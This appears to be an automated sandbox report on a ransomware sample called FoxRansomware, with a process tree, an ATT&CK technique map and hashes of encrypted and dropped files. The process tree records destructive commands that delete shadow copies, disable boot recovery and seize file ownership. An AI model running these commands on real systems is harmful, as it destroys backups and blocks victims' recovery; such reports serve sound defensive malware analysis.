C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index""
2⤵
PID:6080

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index" /E /G Admin:F /C
3⤵
PID:6208

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index"
3⤵
PID:7236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "index" -nobanner
3⤵
PID:6424

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "index" -nobanner
4⤵
PID:6148

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3760 --field-trial-handle=2252,i,16504368816373493055,9578615028378602855,262144 --variations-seed-version /prefetch:8
1⤵
PID:5924

C:\Windows\SYSTEM32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\f5sS4CPO.bat"
1⤵
PID:5152

C:\Windows\system32\vssadmin.exe
vssadmin Delete Shadows /All /Quiet
2⤵
- Interacts with shadow copies
PID:6232

C:\Windows\System32\Wbem\WMIC.exe
wmic SHADOWCOPY DELETE
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5320

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled No
2⤵
- Modifies boot configuration data using bcdedit
PID:6600

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
2⤵
- Modifies boot configuration data using bcdedit
PID:7956

C:\Windows\system32\schtasks.exe
SCHTASKS /Delete /TN DSHCA /F
2⤵
PID:6240

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:7400

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

File and Directory Permissions Modification

T1222

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Defacement

T1491

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\BHO\[PabFox@protonmail.com ].QA60Y0sF-DLMf6ihM.FOX
Filesize
516KB

MD5
ad5fb4c9f75e921b1fc13b55269f18d2

SHA1
132f5582aa9d1e1a0ab33da6a8a07d9c40a7c8ff

SHA256
37871c9d61b5edfe97b247269ddd88e126830da965300619e226eb2a2b308c2a

SHA512
ebc5668bc7d717c08ea22a5b17bbe31cf508b56679d9382b52d602a49660f374b691e9c3e006072314b56597ffff53a4e862253011f56de3fac10ef4ac5e2dbc

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Installer\[PabFox@protonmail.com ].1Adtgym1-SDvRX8dw.FOX
Filesize
4KB

MD5
c9a74fb517cc932483f2e66045458878

SHA1
22414fcd64df8ac88c48dd22dfa8d065d13bb9d2

SHA256
ce7395838f8b9f9c62d8f166d53b1738ea00441a54ea9cca3cc3750d3a390927

SHA512
db5ca257c5e0469c5f5e4805bd5e6abd1e2e2b3eafe67e85a34c6d2f39c6639dc39b4776a299b7554df1e621d97fb8d9d2550a8b7bf6a4804e7d5ece358a63d8

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Installer\[PabFox@protonmail.com ].O5Le3p2C-jGEjXeOq.FOX
Filesize
6.8MB

MD5
51781036c5adf96f238810a9f35477e9

SHA1
6cae0fa093d6b4e4f4e0c1f7af61eda1bad69718

SHA256
002a89fca4a8e9344799ccbd3642e080049aa5b757dec637d681adcd41cf2e9e

SHA512
9639dbc5dad09f47422e6adb304ffbac6fa759e357f5605dd3a20199ff810c6affc5d126159457528868c1a472ddd0d39435a9a4c3f213ce740052240a508f5c

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\[PabFox@protonmail.com ].4UglO99A-ORfd2V75.FOX
Filesize
1.1MB

MD5
492a3e4ae2772672968c8ae7628924f4

SHA1
a2e8233ddbedcdc71e1407643ae259bb37df8d05

SHA256
7eac97c395c6bde3c4a9df480da5314cd099043728fc6071b3eb91f70c4df498

SHA512
a394e5e072b32ca2067482ee33dbec40d20315eb2abf1e9235c70b15945780e751d6d957c6b8de8c7ad421844defbb60ef9825e69463206ad98736663a6126a1

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\[PabFox@protonmail.com ].P2sbOefN-BIbsYOaH.FOX
Filesize
2.2MB

MD5
9a4ea062c83c72dff6b1adcdea0e30f3

SHA1
3ca9b756e6c21c68c9a62781c98e0f8d91182074

SHA256
8e70343bd8ef2278713790272a0bf27872423e4fa13b44d84ecd76adc87c76f8

SHA512
d9c6d8da463f0ef4e433bc4793702e0daff0b34455206467acab0089555286c69ca4e05292b4938a63170e86e5f2f69f1436d233eca3ff6f169658d406af7e52

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\[PabFox@protonmail.com ].tvVkf9wL-bPQima0m.FOX
Filesize
906KB

MD5
f4a55188b9016c7e0e735da9691fd1e8

SHA1
c57c246eec252c38fc62daea1f4b32b218c914ed

SHA256
1b6f14ebc323559ab5b721e8797ad1feaf0e304edfc3edb904b4f21afa95f6e3

SHA512
ff84543cf6e1362dce05318eb2a5558df9808878c166b1de9638c62fb62b0d4d924e6900686409e049f57d237d657c5b7942eaf928ba363ea97cac03326933e0

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\ar.pak
Filesize
1.5MB

MD5
a49a8da49886f0e004dd925f8d716528

SHA1
3da5f5916884a8d8bf1a875975d5a8de47fe0145

SHA256
6a92d5fa4dcfa9573b2d65ccb39f72cc2dd941326b19e8c1b2e98dcdc6afb3e8

SHA512
b1d313b489d0d1f510c16df589788b887679549e91e2f3c3c209eb30bacb315536d57a1fc8060defab34cedb3497f2c8bea3bc91acd01ef713ab190797453158

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\da.pak
Filesize
992KB

MD5
22f912767540459f65cfcb8d84107710

SHA1
e9a56524bedf0d6e1f1d5e73c90db6c8a8174f34

SHA256
01de9e9724329d38a90f3f37fbbbe7050ae7c9a1c024407433df20e0d530c098

SHA512
d98cc7b7839c3153f22952626df0e15965175bfedb782de1dcb6a7f9384a362b3131e408512d881a83490cb9ceacf9e5cf6dfdc08922bfb641cec508e6093a1b

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\fi.pak
Filesize
1.0MB

MD5
3c3f6f15b113391e025131f56a453417

SHA1
01ddbd3fbd8004ac247aeae9c402977cb9c633f9

SHA256
ae4f478137250a221094f832ac99a210c3aad41f303508986a33af383dcf2037

SHA512
8fd110ef6f488ccbf15daf3523fdb3b3caa37a52d9be07d2d09afbb62334b7a0085288ec6abd800d3f1875639010870010d9f850c5a9769c0c468485baa72be9

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\fil.pak
Filesize
1.1MB

MD5
435ef35c1e63a50c290a1739967f256a

SHA1
3461b2a3673f9997877c1094e5500df2a6172965

SHA256
8aa52f12e7d79bdba23e9801cde462c1e19f2d78b0f22f7828e20f6e660abdd1

SHA512
4310428167cb464203ca7be70f82f0815197f89cd2901327313532b5be724864b0d5e59506748d7f33fc4547094c9d9f94a7d718aeea2f149bcc5169cc7ee759

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\hr.pak
Filesize
1.0MB

MD5
223142bb9167ee6064640a62bf722014

SHA1
c045a9a1f2751c0b400d39a8832a4cca138c2d42

SHA256
c2159c0de9a8e657ec5708ae9ad53a7e537172f0d5361a59b9835fece4ad39f9

SHA512
489c5603f509e9abdaea061e234f1d5cee4da77d60e94da37524c0c1b0c6ea15ba460b11f082890400a9247fcba852c4168a4f5c66b7a6e0bd03bd78c0c4a417

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\ko.pak
Filesize
1.0MB

MD5
2906c254f66f3a31b148ad882958dbf6

SHA1
e6bd0b6d787e29e280ca845af2b8ee017bf938c0

SHA256
e853de15b518d983708bb5da7ce1b4af6ff549dc90c7c966792e3b36c02f6fe2

SHA512
15db5ea24688e7676ee72ad9227967ba462ff710bc892ab301b0566982b29eeb7c539076eb3c62ba60913b3c094355c78139325e610374959afe46fd9c67453d

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\ms.pak
Filesize
1006KB

MD5
5c6b3f3b36e8049d3d0beb0cbd78a8ca

SHA1
1cdb4b085c7adcadb627110fbac352dea9366706

SHA256
123337606daf9992525468c737c49beb223dd1a2254cab3e01b39ecb10569d27

SHA512
71e5ac26cff5629452adeb590290bae64559dedc597ef0bbb9459de0bcfdb6bc9dec7e00bf83ca7b24b4387e0084e7c0ded016e4631906992bc885b0a3f8825d

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\ne.pak
Filesize
2.2MB

MD5
54f8794b0d992d8e82b97f5963634f73

SHA1
7a457cd0ad57f55a9d97b6f34799a05f9e4828c4

SHA256
055b9cef82ce74b70eef0f273cd0cb2ae049445ef2178dc4669042cd55aaa600

SHA512
12942202d4ef8cf358bef85b492546057de9a54f2c48bd2a08b84669c4ade5a796a65bd2e105629cd50b442a69a4eaf2f65ab55c4bb4af59d4f01054e850559a

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\pt-PT.pak
Filesize
1.1MB

MD5
02f4a2e4a5e7ef0865075f89b73e563c

SHA1
c77071c91bf8baa4b2c44e37984b1e7cfeed3442

SHA256
a74ce713c8f8e7f4318f59c51fc3d93241ca7721c0b4eff78aadaca1d3f80131

SHA512
44d9da7bd20ed9286e45f31cf00d68adcfc6f1efc239c1876a06de04d57f894e5c21ff3896c1d99e96907fa06d4c00eff5ff1ff0ad1220db1e45091c6827833d

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\sv.pak
Filesize
993KB

MD5
5c9fd7107c4f992acb8dc61c093164de

SHA1
ddddead3e9b38b36ff3bdb301e4231d7c8332ddc

SHA256
7a2fbe3b2855de7d85d06db1b8dee29a9132ca9d366ea47607d86789f2d4fa0e

SHA512
144a39cee3b1ff97ae54c5afabda20edea3866bf221ded63dc31314d1097dfa691331a44a5f6a40566f9652401e62600bac1d7a6cf9ea5d122de57dd1ef28048

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\zh-CN.pak
Filesize
854KB

MD5
f9b00948d898b45d322086d47b66ae36

SHA1
9a2fd6527ecba143ed18a06ccbded1c2dfca9055

SHA256
a5f041d694dfc3f6213157892a7dc85db58f579a3d49f38b517a342b1974f35e

SHA512
3f524b981a921c54cf91b47470d06845e1190b253420957b8ed898a4e7804a305ab17158f77221eb7347c9849b60fdee82a726f9000f21053f5f4a1a71203c3e

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\zh-TW.pak
Filesize
881KB

MD5
5844e3967433a10a4d04e9477f925f53

SHA1
190d7b01c408888c4d8349bddb3db956cac7f0d5

SHA256
987c33fd679c29ff018a444908a4708bbc052fd2e66a68773ca8467699f7ba13

SHA512
989b6dd3211bfeb9ac066e77a7c70bff4720a68f95d4f91b58e3ca13ba6c076afeba23233c0b50c91c48d60662f66246f159e0dbcd7338811584acf9591e29ea

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Notifications\SoftLandingAssetLight.gif
Filesize
126KB

MD5
05e1cfaaa4820941b1c88c4458ebf4cd

SHA1
94713fabbf8173dac4655d27facf9603b4f085f2

SHA256
bc66a163a1c8325ba0d578097060d55ba9b6218711623934c307cd676ffd6e91

SHA512
36a12750039e3619a042f2351ead84e04ea2c3961dfdf52a21b7bf35fa91061eac317ed31bc25594fe8d510ae5a7792116a045631e72721c0332c1060a1f9c8b

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\[PabFox@protonmail.com ].2hmONC0A-sHZxIKi7.FOX
Filesize
3.4MB

MD5
b9bac797b55ce3c2f242e665367d5a07

SHA1
fbcd11ea2a3c70f5ec0bb7bd6a5d30f259d71ebc

SHA256
866439429cc113c09d7bd16b482165ad67cc103d3997938f99e8b34c363df30c

SHA512
2dbaae44b60fe0d8458bb7e470a8cd99be4b5614de255ec60cc34829e9de566ced2fc4f7546a05dceac5f43548defa9762510669d6a9efbaf097d453287037e3

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\[PabFox@protonmail.com ].3h9SRta3-XdNPcgYp.FOX
Filesize
1.1MB

MD5
be7b6b903fab6551c717c30eae4edabc

SHA1
9f3a52f5c387d6a5696d72cc67419a94704764fb

SHA256
8773094d2a9a6ac8c47931ea8c4316d73f59d6a96ca271d4e89a4828ed514073

SHA512
bec4c6a0d9458e27676f455f7cc74c506864a03dd3743f0927053fab7c30dd8b5eb49cd80b714e668b09f49b8a45f26931f42cb890cb12dca92cacd278a2dbc0

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\[PabFox@protonmail.com ].FNm5rdDw-lOWKx8s6.FOX
Filesize
1KB

MD5
fa0622d5802627157000b98c70f1ed5d

SHA1
fc7be3aa1b5cfc5c8ee5f6840c435440c7834603

SHA256
61b37b5f14183248fd944679e9ead22b39fac0a69742aab53069c583962ff3de

SHA512
4b08d8c63c01e22ccb327482a1dc28893b1ab721b485404079004d0a0cd4c91858760a93f69f8bdeb79bc7f60657db69979393b92b442475215b4f10a8b91601

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\[PabFox@protonmail.com ].Fm6xSbXm-NFgbl8Y5.FOX
Filesize
1.1MB

MD5
902ceadabd504596d504d5794d35adc1

SHA1
b516cb36cb94fd0d4bab861b6b215be0471942d1

SHA256
37057712ee3c80c1b8820e22cef4ab04fe466dab20ce9c974be39c51394ca5a0

SHA512
47b6d97862fbf3423ef74341d5ca03089f9f3a71c4b98da1bee434216018947376a9f494350312d9513035bda03f61b65f84fa6c9193a25d6a06fed12c05c28f

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\[PabFox@protonmail.com ].Kxc3IBRW-fdRDmCz0.FOX
Filesize
3.9MB

MD5
ac251d65b725f9499ba9a554f396695f

SHA1
e5f4a856987291d50b70640477445c002ee2ba58

SHA256
fa0eaad55f7da0cdb8e59ae9ae8ff6bce34625e47584d6f72a8c9791cc3ef462

SHA512
26fd10b0aef4594d2a0030ef70b2ddefd071ef2b13e28deb83bb863403150fcd10f3cd31f7e2579166ba2855e0cb1e89cd3683bcd5488f4f9cdbf33b5c970670

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\[PabFox@protonmail.com ].LEbwCI4m-JCu4qJvM.FOX
Filesize
1.6MB

MD5
f32563ba4d058869070f8127f7f4a0bc

SHA1
0f2594f703ea0b487685ad19bc1c0ae08abf60fd

SHA256
3563183831bfe9ac7e4df5320a426b59f0808377b53dd0d479c5c8cc2f15cfc9

SHA512
679202671ee06f81347a967a8b1d281e7b7b93ed12be5ef548d98114ad50b68df1a3eccb029227dc1cce7e68d232147548715c31ecea3ba16be8d1f20c546cf3

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\[PabFox@protonmail.com ].y8DSA7bq-P0sfWRgz.FOX
Filesize
1.7MB

MD5
f507bc80ef8b40a4d8e29f4da541d21d

SHA1
17b6d7c64500d4f74bf8e1268e101f3e4bbe1859

SHA256
ab3d95d6a7176eadfb5ef37ef07c0f2ffa74fc8dc50d54de2296f3d625c713ff

SHA512
b9ae2c2f74d7e77667786f7ac025baf1ee11e7992ecbc8d7313f6829a1647e7e0bfc1397f521a4796287cd8847dcec3387cd4859b3f44067ad0efb6dc0aef3c3

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\delegatedWebFeatures.sccd
Filesize
19KB

MD5
d53c5598022a3fb39469ef44ab1f33d9

SHA1
2085b66beaa24d5e5d49b478bbf8417fb6a0316b

SHA256
c866950d761da31b50128e62c222bf3bd99f1e120133bbd9e1e967eab4d5f40a

SHA512
fc0c0e5e2052d33ab834886e392c75376c0f0b8586a9a14c379f1ee5fe662129cb79441a99376acccc4c2383919c5a25f0dffaac56338bceb72767d3f99c1065

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\identity_proxy\[PabFox@protonmail.com ].Rx0TAB1z-TGjrCuMg.FOX
Filesize
2KB

MD5
b03834dc353d8301f921d58ae964d40c

SHA1
e3808e71c620cb25f46b7a663aa93b38f750598c

SHA256
bb20b985587b308493286889a2eb5f3a2cab34507c170c64e383681bea047286

SHA512
328e8044c8533ae610d79767842367fe3cecd3a6b6af3dc365ef1caf5bb4ea098522f9ad1b7fc909e4fa5360487cf1ee26a630cc9480956a7cc3c5a937cf0687

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\identity_proxy\[PabFox@protonmail.com ].iJZlq2eR-WsLQbJfb.FOX
Filesize
2KB

MD5
36b99691ce898c2d1a4026c75dc3de4d

SHA1
d302d6460ab1d5c7cfe70b8bd68090198282f82b

SHA256
a88df005444c686f5846350d7f8a9bea0b28ad6d88b6e7fae68493f633ed0200

SHA512
613d7ea9d6ecfc23ed22ec8cae3b75d7756a2dcb61a90128932e1862238ab8dedef4589fc94fe7649e3399dbed7926c792cd940e7e5e3ea8df41e59f9d707034

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\identity_proxy\win10\identity_helper.Sparse.Stable.msix
Filesize
58KB

MD5
4b3ecbdc23a78526307c0af7b57e2929

SHA1
8efb97e00e78aecd13ac9096e6bdcd668aad2a38

SHA256
7cfe194619100e07b6b081459e26392224340aa3417bf475821afa7484fe7158

SHA512
8cef2c4c19573964fdc2582728338bf27bb46a2de389f671c90a0ecef706154fbd4bf5ea0dd77075acd7ccb0463bf1765deb21500034b03d695fe98aef92dffb

Download Submit
C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\identity_proxy\win11\identity_helper.Sparse.Beta.msix
Filesize
54KB

MD5
3041f6bdd32c362d5086e3436ee5d671

SHA1
59eaac89e4ce4b22214cda07faf0c352c1b5f8ad

SHA256
11f6841edd3bc57e60ad095c125c031e066ecc1e5fbaf5e59361eb6bf12b4fc9

SHA512
a4452105f8d9bd4d917983a3253eb3950829894b983345286e345e17bf91f991567c12e940c179a15c329eb0db64184fb8daec1dd1c35f4c1a27a1b8838f849d

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Edge.dat
Filesize
13KB

MD5
b90ac523d0b40ef30138873cb2d8babd

SHA1
a3a77bdbd74bc0f7fb7ddf5a7ce38ad7ffd977d1

SHA256
63a35b23da3055091ef78ad28f0f13da18512be69b2bb4b8f6e9252bd232420e

SHA512
39b1e6be8844088cc1aea6cac460e2dca2ad2fc71704a96dd191440c48ccd9cf0b37f290bc41ed7bdd63159a8daad9fd2b12c67e70a659b87f00284f28ace9eb

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\EdgeWebView.dat
Filesize
9KB

MD5
63de4243ad1787ddea491a5954518b1b

SHA1
8272ac244e2f79d96a956056872f9c99fd9c689a

SHA256
49904ac4cee6af117f4861428647fd582de1820954f0373ff953035198415b6c

SHA512
7ded18665657c4d4ab5b6399b8a65226350f9716b88ece0376efec93af26c53677b0ac813a2652f777b74a0972455d78809a4e929e3760c68563d9db7e9fdada

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\az.pak
Filesize
1.1MB

MD5
ef251e02cc2bc90047550d7c729f2b2d

SHA1
ade7b1b715d8310f8385c3647915e4aade9077f9

SHA256
6f954f80c840f427a85522b5cbaef3d840333393d313f04c754062e81ee59cd5

SHA512
031717e6c0df40fea5e56d00a0cabb59690e4dd729c7286f5e3d403a246b62e45f1400a082fbd1d2e8b24f8088d75176f2996b6d7759b70c17c4309529ffddbc

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\ca-Es-VALENCIA.pak
Filesize
1.1MB

MD5
172fa04060eae81f122c25cfe829bb66

SHA1
1ea0640037d8ea47f4545a2372fadef8443857fc

SHA256
a881426483631bda89948dccfd7b57e553cd53c5f5dcb85a502da049988ad657

SHA512
18c0966ab091589ef15605c1c19818de460b81e58fb50c79a21a1d02931fa7567acbe6b22f3b9cf759a1a6a655e94c7522f304d3391299d2d2eb7207615a323b

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\el.pak
Filesize
1.9MB

MD5
175473d8fcdf234bb1f1adcfbc4c246c

SHA1
fdd2c9118c78b197338cf458af04b7c5330cfa0c

SHA256
1d75722fc78fbaf20d4c26f5676c47a93516e2d04f48f879c8cf86aa9cc5e09a

SHA512
4eccaab73b1f635f76fdad5cab57f440d5e1bd5d2b6180e90a6b434f7e2da037723688ef0c53089fb588d439a720f63b478bf01b65bcd9f22e25bb27ce82ea9f

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\es.pak
Filesize
1.1MB

MD5
65fa3365b17da41699158bd9ae9b9284

SHA1
66ba27a04b5f51cb5cefb5bd37d36e7d8c5c330e

SHA256
c5e6e260b529b7e44f60c1e3da5f7077859978e22b49ba238906726e7b45eebf

SHA512
be98340de164ccb4f8b2abc95ed8b110446a22fd1319555a95539af9cf83fa89c15e97b2a0528c3d0fbecd807bbe292ab610fd6a7bdbb068374a9d8b0a6d21da

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\fr-CA.pak
Filesize
1.2MB

MD5
77bbf835d55c11fec7d54c21199ebae5

SHA1
5d9c24afe89cecf594e97bdfcac078b6f8dbb2ac

SHA256
bbe0fe3f64496bcf262e7ec13e1b9952266248bbf639004c55f23caabe25e60b

SHA512
322990cff6947c0ee0ec953c8dfe5b6905f0fb12f2a651868b26138223b8ca3e5bf45355225072eccc9c96756d85ea323251550781359c91b7b927033f3dae9b

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\fr.pak
Filesize
1.1MB

MD5
7442111cc22992623a6787cfd4d203ff

SHA1
c45bff03eb8e0af076396e0686c3edc11ab2a639

SHA256
ef5472cc10a68f90d7fcf4780992493fea12cfe44c8f6b4420e1b234edb1077f

SHA512
6be5fc5784cc46833cbbb2157e4fd7723bf0478bf038a7b2533dd3a8d0f75387ec506a355279bb11bbbaf4037ebc6c198dc299adabb2b712c1e0d4e3cd66a8df

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\ga.pak
Filesize
1.1MB

MD5
b517f559e47bb3bc08554d3ab487dfa3

SHA1
188083f593d6090280b888b204354dfd14ea5caa

SHA256
885ea31c1b2e59fca28dba9d6a1d1c8e197e85067597656164c5a94249a8c66e

SHA512
04eff4cb3886b82b73c9bc75f4731605402460c6f0bb659fd277761251c8c8c088fe065482b2a4c05626024bef1c0858b3952785a82d4bf2059e446e7e6d56df

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\gl.pak
Filesize
1.0MB

MD5
ee36ab80cbc0fd523b1ba6b1806fb13d

SHA1
5b3dd82e57df186b415642c819e26588c0f0eafb

SHA256
b460821146acbf748faa296465cd9d38d1f3f4264950e108266ce1b1c15f6a48

SHA512
711492a9675d20b3c2e3c4177e8f2be53d30803ac6e7474da1021d9b460fe12348acaba9b6ca23e8b8e493e66539a614ce3e50d23f01b46f5ffcf39ded93c0ad

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\id.pak
Filesize
977KB

MD5
92918ac8ae199f052c88402e1928e891

SHA1
0b40dd4e471e1292614167e99f80e1a14c6cec27

SHA256
64d23b08f6e918c2f827de8f9245522cf667770ef112ed827c2c9f3b4cd70af6

SHA512
92a3903ca63afc82d13db7d7e88902a3a5817d336f80631c1c35e02e3472f43ccb2528c7e196de6e393591399ce38b3beab8f39e8b8316b6f98ec1d4ecf9bf92

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\is.pak
Filesize
1.0MB

MD5
229ebd85e71608208f222b9d1b4987b9

SHA1
2e85ce11c34dd2429e42968f4d3929126c572b02

SHA256
27a1832096e2a516313f505afb0ca98823589ad32615884d2e5f28aa35bf4bcf

SHA512
84799402da8399b263d71616239d0daa3407867e6cdda288fb8f6564ec36b3ef958408f3b544b8787b9a04057d6dff6dd69f357af5701c9e07ea291a5702eb52

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\ka.pak
Filesize
2.3MB

MD5
9f88d5c39b7320efd351c5b3f8e4b3f1

SHA1
9a7cc2d0ee0011769191c30609cf1bcc903a77f7

SHA256
28635a619cd13c114eedf016888e114a9cddb7dabf474bfde67abf052ced46ed

SHA512
23f2fa510454ec030c24af3d7a49663dd7715f928c0bd51fe3870c2618073e9783d1cd246af5ff5ff4cc6098b5b563ff95e40f7f0aac6f4a2569003039fb14ad

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\lb.pak
Filesize
1.0MB

MD5
521816e2f9cda9adb5eefbef649c114d

SHA1
df8789258e2fab649ac79240e9d3465a448da324

SHA256
a366c836e6c2f41046ffef357d51e7ec48136bdbf2c78145d9f3a4a7190d1c0b

SHA512
00c0d057a80bbaa71e12ca31b567a3586c8eb26cb897bc0bde48a8443d481cd4ceb74143acb5c0965d5546a54d58e986775241b707d5b8884e73aa1a95371d58

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\mi.pak
Filesize
1.0MB

MD5
56c386ea7a2cde44e3dcb485fc518328

SHA1
5f744dd9c345fc91c44c5b1cd2d278ab8c82443b

SHA256
70e787b5fcb96eb38541845a41bf8faec4445c4a4ad446a63231710cccfa7913

SHA512
9b40a5d2b8f5b07c14cca30473400c2b557f07d886feea794b5286893435b0c17cde0119cd862ee80c001ddf6b483a73e2ed9ef2abc3b1936f4401ddebecc54d

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\nl.pak
Filesize
1.0MB

MD5
5c49f082f9417fe21d8f843b37330ee5

SHA1
1a222d4b4c0948ee0e725d95dfa73111f41e8a8c

SHA256
4ae0f7e40d92d353c660a23a4ab3d202ad78f8d70a000f674aae57fea55568a4

SHA512
d48286d48af21899ff9da1b4e97bf29e97091e0df6c25aa5e057ac5408760878e1732e9cc66609416ebb82fcd1dbbd0c5192fb431091b5ab513d2142b397b96e

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\or.pak
Filesize
2.3MB

MD5
740b27602ffd8c92cc53389c929c58a1

SHA1
75e4895e0b32d8ae59414183eb7d229ea2d88f2c

SHA256
3c0caf8bc20aacf58479a1c80eac3c77dae82a2d602733518181ff2365f68607

SHA512
c9fbf09ea4cca2d60249d5fb7123e11352af3ce5f1d731f06106a62eee4e89e8d078cca8550879d8e9dcb8d41c7808b6b789a025fc7152f60e85cd9c6d47beef

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\sq.pak
Filesize
1.1MB

MD5
f8b109dbc302a7743f48c694f542babe

SHA1
7c035da34c58d092cb7230c76e895489685f4b6f

SHA256
093d245abd0c2d7163a748991c5d4ab3bf3d982043c8a105f547a99667f9bf11

SHA512
764e96e7cfd39a8f10946d476d0bb712a3fd0fff5026a8752b876b6fcdbd9773f1f49d31a7557571dbd5128b09d98a408a0d452de3b254c98a34b6bdab6ac5e7

Download Submit
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\Locales\ug.pak
Filesize
1.6MB

MD5
c08f364c5571949b63ef931bfbbb5a2b

SHA1
4060a78653f3bed3459dbf691a1a5a36d1e894d6

SHA256
bd53dfa089f6808aa5c40918ce589f679d0a016b57a99b8e2d5100bb2780ca87

SHA512
86ae69af567bd153cc28327fa7ea8e3154d704847aee45bd905162a7e1cc6aacaef0d51cb1730068273847395394b94bb18a4630576024f6a03bd92d4f47d490

Download Submit
